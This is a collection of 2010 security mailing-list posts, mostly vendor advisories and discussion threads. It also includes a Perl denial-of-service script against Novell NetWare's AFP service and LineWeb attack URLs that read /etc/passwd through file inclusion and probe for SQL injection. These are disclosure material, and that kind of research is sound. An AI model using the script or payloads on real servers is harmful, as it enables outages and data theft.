Re: Secunia Research: TSC2 Help Desk CTab ActiveX Control Buffer Overflow
Please note that as of version 4.3.1, TSC2 Help Desk includes the patched version of c1sizer.ocx (version 8.0.20081.142) which does not have the buffer overflow vulnerability. Servantix LLC
{PRL} Novell Netware CIFS And AFP Remote Memory Consumption DoS
#
Application: Novell Netware CIFS And AFP Remote Memory Consumption DoS
Platforms: Novell Netware 6.5 SP8
Crash: YES
Exploitation: Remote DoS
Date: 2009-12-21
Author: Francis Provencher (Protek Research Lab's)
Blog: http://protekresearch.blogspot.com/
#
1) Introduction
2) Report Timeline
3) Technical details
4) The Code
#
===
1) Introduction
===
Novell,Inc. is a global software and services company based in Waltham,
Massachusetts. The company specializes in enterprise operating systems, such as
SUSE Linux Enterprise and Novell NetWare; identity, security, and systems
management solutions; and collaboration solutions, such as Novell Groupwise and
Novell Pulse.
Novell was instrumental in making the Utah Valley a focus for technology and
software development. Novell technology contributed to the emergence of local
area networks, which displaced the dominant mainframe computing model and
changed computing worldwide. Today, a primary focus of the company is on
developing open source software for enterprise clients.
(http://en.wikipedia.org/wiki/Novell)
#
2) Report Timeline
2009-12-21 Vendor Contact
2009-12-22 Vendor Recontact
2009-12-29 Vendor Recontact
2010-01-05 Disclosure of this advisory
#
3) Technical details
CIFS.nlm Semantic Agent (Build 163 MP)
Version 3.27 November 13, 2008
AFPTCP.nlm Build 163 SP
Version 3.27 November 13, 2008
The CIFS and AFP protocols have a memory consumption problem when their
received lot's of malformed arbitrary requests on their respective
services. Sending arbitrary crafted requests to these services will
consumme all the memory available, create multiples abends and finally crash
the whole server. It could take couple of minutes to hours (Depend of the
memory available on the server ).
#
===
4) The Code
===
#!/usr/bin/perl
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Novell Netware CIFS.nlm Remote Memory Consumption Denial of
Service
# Here is a modified version from the script written by the researcher
Jeremy Brown
# http://jbrownsec.blogspot.com/2009/12/writing-code-that-breaks-code.html
#
use IO::Socket;
use String::Random;
$target = $ARGV[0];
$port = 548;
$protocol = tcp;
$maxsize =
666;
$random =
0;
if((!defined($target) || !defined($port) || !defined($protocol) ||
!defined($maxsize)))
{
print "usage: $0 \n";
exit;
}
while(1)
{
$sock = IO::Socket::INET->new(Proto=>$protocol, PeerHost=>$target,
PeerPort=>$port)
or logit();
$rand = new String::Random;
$random = $rand->randpattern("." x rand($maxsize)) . "\r\n\r\n";
$sock->send($random);
close($sock);
}
#
(PRL-2009-27)
__
Looking for the perfect gift? Give the gift of Flickr!
http://www.flickr.com/gift/
[ GLSA 201001-03 ] PHP: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201001-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PHP: Multiple vulnerabilities Date: January 05, 2010 Bugs: #249875, #255121, #260576, #261192, #266125, #274670, #280602, #285434, #292132, #293888, #297369, #297370 ID: 201001-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities were found in PHP, the worst of which leading to the remote execution of arbitrary code. Background == PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-lang/php < 5.2.12 >= 5.2.12 Description === Multiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below and the associated PHP release notes for details. Impact == A context-dependent attacker could execute arbitrary code via a specially crafted string containing an HTML entity when the mbstring extension is enabled. Furthermore a remote attacker could execute arbitrary code via a specially crafted GD graphics file. A remote attacker could also cause a Denial of Service via a malformed string passed to the json_decode() function, via a specially crafted ZIP file passed to the php_zip_make_relative_path() function, via a malformed JPEG image passed to the exif_read_data() function, or via temporary file exhaustion. It is also possible for an attacker to spoof certificates, bypass various safe_mode and open_basedir restrictions when certain criteria are met, perform Cross-site scripting attacks, more easily perform SQL injection attacks, manipulate settings of other virtual hosts on the same server via a malicious .htaccess entry when running on Apache, disclose memory portions, and write arbitrary files via a specially crafted ZIP archive. Some vulnerabilities with unknown impact and attack vectors have been reported as well. Workaround == There is no known workaround at this time. Resolution == All PHP users should upgrade to the latest version. As PHP is statically linked against a vulnerable version of the c-client library when the imap or kolab USE flag is enabled (GLSA 200911-03), users should upgrade net-libs/c-client beforehand: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/c-client-2007e" # emerge --ask --oneshot --verbose ">=dev-lang/php-5.2.12" References == [ 1 ] CVE-2008-5498 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5498 [ 2 ] CVE-2008-5514 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5514 [ 3 ] CVE-2008-5557 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5557 [ 4 ] CVE-2008-5624 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5624 [ 5 ] CVE-2008-5625 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5625 [ 6 ] CVE-2008-5658 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5658 [ 7 ] CVE-2008-5814 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5814 [ 8 ] CVE-2008-5844 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5844 [ 9 ] CVE-2008-7002 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7002 [ 10 ] CVE-2009-0754 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0754 [ 11 ] CVE-2009-1271 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1271 [ 12 ] CVE-2009-1272 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1272 [ 13 ] CVE-2009-2626 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2626 [ 14 ] CVE-2009-2687 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2687 [ 15 ] CVE-2009-3291 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3291 [ 16 ] CVE-2009-3292 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3292 [ 17 ] CVE-2009-3293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3293 [ 18 ] CVE-2009-3546 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3546 [ 19 ] CVE-2009-3557 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3557 [ 20 ] CVE-2009-3558 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3558 [ 21 ] CVE-2009-4017 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017 [ 22 ] CVE-2009
Re: Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw
Aditya, > Video: http://www.secniche.org/videos/google_chrome_link_inj.html You might find it informative to review the section of BSH on URL parsing: http://code.google.com/p/browsersec/wiki/Part1#Uniform_Resource_Locators There are many known quirks related to URL parsing; the practice of certain browsers to tokenize the authority section using the rightmost @ sign, in particular, is documented there. Three other spectacular examples include: http://example.com;.coredump.cx/ - MSIE will take you somewhere else than most other browsers would http://example.c...@coredump.cx/ - means one thing to most browsers, something else to Firefox https:example.com - absolute to Firefox (while http:example.com is a relative link in that same browser) In essence, any site that accepts, but does not normalize and rewrite relative / not well formed URLs, and hopes to achieve any degree of control over the destination of that link, is bound to fail. The particular example in your video seems to be a clear case of insufficient validation, and not a browser bug. It is also unfortunate that URL parsing is deceptively difficult for humans, but that's the way it is; address bar host name highlighting and auto-hiding of credentials is the only sensible approach I can think of; crippling URL syntax, on the other hand, seems heavy-handed. /mz
[ MDVSA-2009:220-1 ] davfs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:220-1 http://www.mandriva.com/security/ ___ Package : davfs Date: January 5, 2010 Affected: 2008.0 ___ Problem Description: A vulnerability was found in xmltok_impl.c (expat) that with specially crafted XML could be exploited and lead to a denial of service attack. Related to CVE-2009-2625 (CVE-2009-3720). This update fixes this vulnerability. Update: Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 https://bugs.gentoo.org/show_bug.cgi?id=280615 ___ Updated Packages: Mandriva Linux 2008.0: 1bdf969bcbde0e5c447f6c69a349e890 2008.0/i586/davfs-0.2.4-10.1mdv2008.0.i586.rpm 3a0db412548d67a97686ef6f271f8898 2008.0/SRPMS/davfs-0.2.4-10.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 569fe422111f00790722b845f1f51411 2008.0/x86_64/davfs-0.2.4-10.1mdv2008.0.x86_64.rpm 3a0db412548d67a97686ef6f271f8898 2008.0/SRPMS/davfs-0.2.4-10.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLQ2Y4mqjQ0CJFipgRAq38AKCWtvRQ5z4gxJH55M0FrV9p3bE9hgCg5gtj L7XmKE06Lid2HmMNBazYzgY= =p3B5 -END PGP SIGNATURE-
Multiple vulnerabilities in LineWeb 1.0.5
LineWeb it's a web-app to manage Lineage 2 private severs, a very known mmorpg,
and allows to do action such as:
Main Features:
- Register
- Login
- Quick Login Function
- Quick statistics function (server status, game server status, online players)
- Statistics (login server status, game server status, players online, total
accounts, total characters, total gm characters, total clans)
Administrator Features:
- (NEW) New administrator skin
- (NEW) New server settings (Edit server settings, server rates, specs etc)
- (NEW) New website settings (Title, Note from the management, Contact Email,
Rankings Limit)
- (NEW) Ads Management (Add, Edit & Delete)
- News management (add, edit & delete)
- Download management (add, edit & delete)
- Login
- Add administrator
- Logout (of course)
Member Panel Features:
- Automaticly views all your current characters when you login (name, level,
kills etc)
- Change account password
- Delete account
- Logout
Live Demo Front : http://demo.l2web.org/
Live Demo Admin : http://demo.l2web.org/admin/
Demo Administrator Login:
user : demo
password : demo123
LFI:
We can found this part of code on index.php
Wich allows us to include local files on index.php by using the $op variable,
IE: http://localhost/Lineage
ACM/lineweb_1.0.5/index.php?op=../../../../../../../etc/passwd
We also can find this vuln. in /admin/index.php, IE:
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=../../../../../../../etc/passwd
**
Strange behavior on op=register:
If we register a username twice, IE:
username=o&password=12345&confirmpassword=12345&email=&submit2=Register
We get:
The username already exists.
But if we send a long string twice, IE:
username=o&password=12345&confirmpassword=12345&email=&submit2=Register
We get:
Duplicate entry 'a' for key
'PRIMARY'
¿SQL Injection?
In admin/edit_news.php we can find this source:
65 elseif(isset($_GET['newsid']))
66 {
67
68 $result = mysql_query("SELECT * FROM news WHERE newsid='" .
$_GET['newsid'] . "'");
69 while($myrow = mysql_fetch_array($result))
70 {
71
We can observe that it doesn't make any check at all any input that we make on
$newsid, so if we inject a " ' " in:
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27
We get:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given
in C:\wamp\www\Lineage ACM\lineweb_1.0.5\admin\edit_news.php on line 69
We can find this vuln in: edit_news.php ; edit_downloads.php y edit_ads.php.
It requires magic_quotes = OFF
**
Edit without permission:
edit_downloads.php allows us to edit any download link, without any
verification at all. By doing this, we could trick the user to download an
infected file.
The same happens on edit_ads.php, if we give to our URL values to ad_name y
ad_content, we could get without any verification, permission to edit news:
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/edit_ads.php?ad_id=1&ad_name=a&ad_content=ARGENTINA
By doing this we could make a HTML, XSS or CSS injection.
Ignacio Garrido,
Argentina.
UPDATE: MITKRB5-SA-2009-003 [CVE-2009-3295] KDC denial of service in cross-realm referral processing
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Updated to reflect the need to authenticate for successful exploitation. This decreases the severity level of the vulnerability. http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2009-003.txt -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (SunOS) iEYEARECAAYFAktCxzcACgkQSO8fWy4vZo5vdgCgkB8odnwOQixbESFIpqoF0O6t CboAoNfB6WfXjCnMzAKRe9ZgRyyYAk7b =87Ju -END PGP SIGNATURE-
Re: [Full-disclosure] [Tool] DeepToad 1.1.0
Hmm, Wouldn't it be more useful to the sec community to have a algorithm that abstracts at the -interpreted- content level? That is when analyzing binaries I wouldn't think that this would classify two with near identical functionality together, even though it is removing a significant chunk of information during the hash pass. I would largely assume that your algorithm, as is, works best on uncompressed bitmaps. Is there something I'm missing? -Travis On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret wrote: > Hi all, > > I'm happy to announce the very first public release of the open source > project DeepToad, a tool for computing fuzzy hashes from files. > > DeepToad can generate signatures, clusterize files and/or directories > and compare them. It's inspired in the very good tool ssdeep [1] and, in > fact, both projects are very similar. > > The complete project is written in pure python and is distributed under > the LGPL license [2]. > > Links: > Project's Web Page http://code.google.com/p/deeptoad/ > Download Web Page http://code.google.com/p/deeptoad/downloads/list > Wiki http://code.google.com/p/deeptoad/w/list > > References: > [1] http://ssdeep.sourceforge.net/ > [2] http://www.gnu.org/licenses/lgpl.html > > Regards && Happy new year! > Joxean Koret > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on http://pastebin.com/f6fd606da
Re: [Full-disclosure] [Tool] DeepToad 1.1.0
Yes. It isn't designed to search for the differences between 2 binary files but to search for similar files, _independently_ of the format, and group them. This tool can be used, in example, to search for similar "crapwares" or to search for similar image files (not similar looking, but similar files), similar office documents, etc... --- El mar, 5/1/10, T Biehn escribió: > De: T Biehn > Asunto: Re: [Full-disclosure] [Tool] DeepToad 1.1.0 > Para: "Dan Kaminsky" > CC: "Joxean Koret" , "Full Disclosure" > , bugtraq@securityfocus.com > Fecha: martes, 5 de enero, 2010 15:56 > I can see what you're saying, it > could be useful for finding > differences in different versions of the same binary but > from what I > can see Joxean's app is meant to group files of the same > 'type,' not > provide 'diff' capabilities. > > -Travis > > On Tue, Jan 5, 2010 at 9:51 AM, Dan Kaminsky > wrote: > > I looked into a fair amount of this sort of > normalization back when I was > > playing with dotplots. The idea was to upgrade from > simple Levenshtein > > string comparison (with no knowledge of variable > length x86 instructions, > > pointers that shift from compile to compile, etc) to > something with at least > > some domain specific knowledge. What I found, > somewhat surprisingly, was > > that dumb string comparison was more than enough. In > fact, when I compared > > pre-patch and post-patch builds, it was easy to > directly see when content > > was added, removed, shifted in location, etc. > Joxean's going to have much > > the same result -- as basic as his similarity metric > is, he'll get the broad > > strokes just fine. > > > > Ultimately the best approach is to build a graph of > how functions interact > > and measure graph isomorphism, but of course Halvar > figured that out years > > ago :) > > > > On Tue, Jan 5, 2010 at 3:41 PM, T Biehn > wrote: > >> > >> Hmm, > >> Wouldn't it be more useful to the sec community to > have a algorithm > >> that abstracts at the -interpreted- content level? > That is when > >> analyzing binaries I wouldn't think that this > would classify two with > >> near identical functionality together, even though > it is removing a > >> significant chunk of information during the hash > pass. > >> > >> I would largely assume that your algorithm, as is, > works best on > >> uncompressed bitmaps. Is there something I'm > missing? > >> > >> -Travis > >> > >> On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret > > wrote: > >> > Hi all, > >> > > >> > I'm happy to announce the very first public > release of the open source > >> > project DeepToad, a tool for computing fuzzy > hashes from files. > >> > > >> > DeepToad can generate signatures, clusterize > files and/or directories > >> > and compare them. It's inspired in the very > good tool ssdeep [1] and, in > >> > fact, both projects are very similar. > >> > > >> > The complete project is written in pure > python and is distributed under > >> > the LGPL license [2]. > >> > > >> > Links: > >> > Project's Web Page http://code.google.com/p/deeptoad/ > >> > Download Web Page http://code.google.com/p/deeptoad/downloads/list > >> > Wiki http://code.google.com/p/deeptoad/w/list > >> > > >> > References: > >> > [1] http://ssdeep.sourceforge.net/ > >> > [2] http://www.gnu.org/licenses/lgpl.html > >> > > >> > Regards && Happy new year! > >> > Joxean Koret > >> > > >> > > >> > > ___ > >> > Full-Disclosure - We believe in it. > >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> > Hosted and sponsored by Secunia - http://secunia.com/ > >> > > >> > >> > >> > >> -- > >> FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF > A73C > >> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on > >> http://pastebin.com/f6fd606da > >> > >> ___ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > > -- > FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C > http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on > http://pastebin.com/f6fd606da >
REWTERZ-20100103 - Ofilter Player Local Denial of Service (DoS) Vulnerability
Rewterz 05/01/2010 - Ofilter Player Local Denial of Service (DoS) Vulnerability - 1) Affected Software * Ofilter Player 1.1 NOTE: Other versions may also be affected. 2) Severity Rating: Low Impact: Denial of Service Where: Local 3) Vendor's Description of Software "Ofilter Player is an easy-to-use multimedia player. It can play many kinds of audio and video formats such as mp3, wav, midi, avi, VCD, mpeg etc. It supports the powerful playback control: play, pause, stop, step, skip forward, skip backward. It can display and configure all filters' properties during the playback of the video." Product Link: http://www.008soft.com/products/ofilter-player.htm 4) Description of Vulnerability Rewterz has discovered vulnerability in Ofilter Player. This vulnerability could lead to Denial of Service with the privileges of the current process or user and cause application to crash. This vulnerability exists in the handling of application skin by the user. We chose not to provide detailed information about the location of the vulnerability and how to reproduce it because the author hasn't confirmed this vulnerability. We can pass a long argument into the skin file. There is no checking of the length of these inputs. Depending on the input, this will cause DoS condition. We have confirmed the ability to execute our own code. 5) Credits Discovered by Rehan Ahmed, Rewterz. 6) About Rewterz Rewterz is a boutique Information Security company, committed to consistently providing world class professional security services. Our strategy revolves around the need to provide round-the-clock quality information security services and solutions to our customers. We maintain this standard through our highly skilled and professional team, and custom-designed, customer-centric services and products. http://www.rewterz.com Complete list of vulnerability advisories published by Rewterz: http://rewterz.com/securityadvisories.php
REWTERZ-20100101 - n.player Local Heap Overflow Vulnerability
Rewterz 05/01/2010 - n.player Local Heap Overflow Vulnerability - 1) Affected Software * n.player 1.12.07 NOTE: Other versions may also be affected. 2) Severity Rating: High Impact: Denial of Service Manipulation of Data Where: Local 3) Vendor's Description of Software "n.player is a versatile media player that plays audio CDs, DVD, WMA, MP3, AVI, DiVX and other media with the preinstalled DirectShow decoder. n.player also supports enhanced features for playing video and audio. n.player includes the high-quality audio equalizer, support for divX subtitles, many functions for video and audio playback and ATI Remote Wonder controller support." Product Link: http://www.softpedia.com/get/Multimedia/Video/Video-Players/nplayer.shtml http://www.samo.cz 4) Description of Vulnerability Rewterz has discovered vulnerability in n.player. This vulnerability could lead to execution of code with the privileges of the current process or user. This vulnerability exists in the handling of application skin selection by the user. We chose not to provide detailed information about the location of the vulnerability and how to reproduce it because the author hasn't confirmed this vulnerability. We can pass a long argument with some commands into a heap. There is no checking of the length of these inputs. Depending on the input, this will cause exploitable condition. We have confirmed the ability to execute our own code. This is a common heap overflow vulnerability and can be exploited easily. 5) Credits Discovered by Rehan Ahmed, Rewterz. 6) About Rewterz Rewterz is a boutique Information Security company, committed to consistently providing world class professional security services. Our strategy revolves around the need to provide round-the-clock quality information security services and solutions to our customers. We maintain this standard through our highly skilled and professional team, and custom-designed, customer-centric services and products. http://www.rewterz.com Complete list of vulnerability advisories published by Rewterz: http://rewterz.com/securityadvisories.php
Re: Y2K10 spamassassin bug, 2010 year mails discared as spam
Eduardo Romero wrote: Hi, Please review your spamassassin rules, the FH_DATE_PAST_20XX rule marks the 2010 mails as spam with 3.6 points app, the workaround possible are: .- file /usr/share/spamassassin/72_active.cf replace : header FH_DATE_PAST_20XX Date =~ /20[1-9][0-9]/ [if-unset: 2006] by: header FH_DATE_PAST_20XX Date =~ /20[2-9][0-9]/ [if-unset: 2006] .- add score 0 to this rule at /usr/share/spamassassin/50_scores.cf replace: score FH_DATE_PAST_20XX 2.075 3.384 3.554 3.188 # n=2by: by: score FH_DATE_PAST_20XX 0 The 'sa-update' options not always works for me. Regards Edo. The daily update of spamassassin catches this. Mine was already updated before i got around to check it Cheers, Rudy
Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw
Hi Recently with an outcome of Owasp RC1 top 10 exploited vulnerability list , redirection issues have already made a mark in that. Even the WASC has included the URL abusing as one of the stringent attacks. Well to be ethical in this regard these are not the recent attacks but are persisting from long time. The only difference is the exploitation ratio has increased from bottom to top. So that's the prime reason it has been included in the web application security benchmarks. But the projection of redirection attacks is active now. This post is not about explaining the basics of redirection issues. It is more about the design vulnerabilities in browsers that can lead to potential persistent redirection vulnerabilities. Web application security can be hampered due to browser problems. Note: The base is to project the implications of browser inefficiency and the ease in conducting web application attacks. Post: http://zeroknock.blogspot.com/2010/01/link-injection-redirection-attacks.html Video: http://www.secniche.org/videos/google_chrome_link_inj.html Browsers need to take care of these issues. Regards Aditya K Sood http://www.secniche.org
REWTERZ-20100102 - Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability
Rewterz 05/01/2010 - Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability - 1) Affected Software * NSP 2.0 * NSP 1.1 Beta 2) Severity Rating: High Impact: Denial of Service Where: Local 3) Vendor's Description of Software "The Nemesis Player (NSP) is much more than any other media player. It allows you to watch your video files collection like any player but also enables you to emulate a "DVD menu" for your videos. Nsp can be broken down into 3 parts: Scene Editing, Project Settings and the player itself." Product Link: http://www.nsplayer.org 4) Description of Vulnerability Rewterz has discovered vulnerability in Nemesis Player (NSP). This vulnerability could lead to Denial of Service with the privileges of the current process or user and cause system to stop responding. This vulnerability exists in the handling of Nsp project file. We chose not to provide detailed information about the location of the vulnerability and how to reproduce it because the author hasn't confirmed this vulnerability. We can pass a long argument into the Nsp project file. There is no checking of the length of these inputs. Depending on the input, this will cause DoS condition. We have confirmed the ability to execute our own code. 5) Credits Discovered by Rehan Ahmed, Rewterz. 6) About Rewterz Rewterz is a boutique Information Security company, committed to consistently providing world class professional security services. Our strategy revolves around the need to provide round-the-clock quality information security services and solutions to our customers. We maintain this standard through our highly skilled and professional team, and custom-designed, customer-centric services and products. http://www.rewterz.com Complete list of vulnerability advisories published by Rewterz: http://rewterz.com/securityadvisories.php
Re: [Full-disclosure] [Tool] DeepToad 1.1.0
I can see what you're saying, it could be useful for finding differences in different versions of the same binary but from what I can see Joxean's app is meant to group files of the same 'type,' not provide 'diff' capabilities. -Travis On Tue, Jan 5, 2010 at 9:51 AM, Dan Kaminsky wrote: > I looked into a fair amount of this sort of normalization back when I was > playing with dotplots. The idea was to upgrade from simple Levenshtein > string comparison (with no knowledge of variable length x86 instructions, > pointers that shift from compile to compile, etc) to something with at least > some domain specific knowledge. What I found, somewhat surprisingly, was > that dumb string comparison was more than enough. In fact, when I compared > pre-patch and post-patch builds, it was easy to directly see when content > was added, removed, shifted in location, etc. Joxean's going to have much > the same result -- as basic as his similarity metric is, he'll get the broad > strokes just fine. > > Ultimately the best approach is to build a graph of how functions interact > and measure graph isomorphism, but of course Halvar figured that out years > ago :) > > On Tue, Jan 5, 2010 at 3:41 PM, T Biehn wrote: >> >> Hmm, >> Wouldn't it be more useful to the sec community to have a algorithm >> that abstracts at the -interpreted- content level? That is when >> analyzing binaries I wouldn't think that this would classify two with >> near identical functionality together, even though it is removing a >> significant chunk of information during the hash pass. >> >> I would largely assume that your algorithm, as is, works best on >> uncompressed bitmaps. Is there something I'm missing? >> >> -Travis >> >> On Sun, Jan 3, 2010 at 6:37 AM, Joxean Koret wrote: >> > Hi all, >> > >> > I'm happy to announce the very first public release of the open source >> > project DeepToad, a tool for computing fuzzy hashes from files. >> > >> > DeepToad can generate signatures, clusterize files and/or directories >> > and compare them. It's inspired in the very good tool ssdeep [1] and, in >> > fact, both projects are very similar. >> > >> > The complete project is written in pure python and is distributed under >> > the LGPL license [2]. >> > >> > Links: >> > Project's Web Page http://code.google.com/p/deeptoad/ >> > Download Web Page http://code.google.com/p/deeptoad/downloads/list >> > Wiki http://code.google.com/p/deeptoad/w/list >> > >> > References: >> > [1] http://ssdeep.sourceforge.net/ >> > [2] http://www.gnu.org/licenses/lgpl.html >> > >> > Regards && Happy new year! >> > Joxean Koret >> > >> > >> > ___ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> >> >> >> -- >> FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C >> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on >> http://pastebin.com/f6fd606da >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on http://pastebin.com/f6fd606da
SyScan'10 Call For Training (CFT)
apologies for the multiple copies. SyScan'10 CALL FOR TRAINING ABOUT SYSCAN'10 This year, SyScan'10 will be held in the 4 exciting cities of Singapore, Shanghai, Taipei and Ho chi Minh City (Vietnam). Details are as follows: SyScan'10 Singapore date: 15 - 18 June 2010 SyScan'10 Shanghai date: 8 - 11 July 2010 SyScan'10 Taipei date: 19 - 22 August 2010 SyScan'10 Ho Chi Minh City (Vietnam) date: 23 - 26 September 2010 TRAINING TOPICS SyScan’10 training topics will focus on the following areas: Web Applications Networks Securing Windows/Linux Systems Databases Storage Secure Programming/Development Cloud Computing Virtualization Malware Analysis Penetration Testing Exploit Development Reverse Code Engineering Languages (Assembly, Python, Ruby etc) PRIVILEGES Trainers’ Privileges: • 50% of net profit of class. • Complimentary entry to SyScan'10 conference • Trainers/Speakers Dinner on conference days • After-conference party. • A very healthy dose of alcohol and fun. Please note that the net profit for each class is determined by the difference between the total fee collected for each class and the total expenses incurred for each class. The expenses of each class would include the return economy air-ticket of the trainer, 3 nights of accommodation (training) and the rental of the training venue. *CFT SUBMISSION* CFT submission must include the following information: 1) Brief biography including list of publications and papers published previously or training classes conducted previously. 2) Training title. 3) Training introduction/description. 4) Student Prerequisite. 5) Software Requirements. 6) Hardware Requirements. 7) Course Outline (daily basis). 8) Contact Information (full name, alias, handler, e-mail, postal address, phone, fax, photo, country of origin, special dietary requirement). 9) Employment and/or affiliations information. 10) Any significant educational/training experience/background. 11) Why is your material different or innovative or significant or an important tutorial? Training classes will be 2 full days (0900 hours - 1700 hours). Please inform the CFP committee if your class is shorter or longer than 2 days during your CFT submission. All submissions must be in English and in PDF format only. The more information you provide, the better the chance for selection. Please send submission to c...@syscan.org. *IMPORTANT DATES * Final CFT Submission – 28th February 2010. *OTHER INFORMATION * Please feel free to visit SyScan website to get a feel what this conference is all about – SHARE AND HAVE FUN! By agreeing to speak at the SyScan'09 you are granting Syscan Pte. Ltd. the rights to reproduce, distribute, advertise and show your presentation including but not limited to http://www.syscan.org, printed and/or electronic advertisements, and all other mediums. -- Thank you Thomas Lim Organiser SyScan'10 www.syscan.org
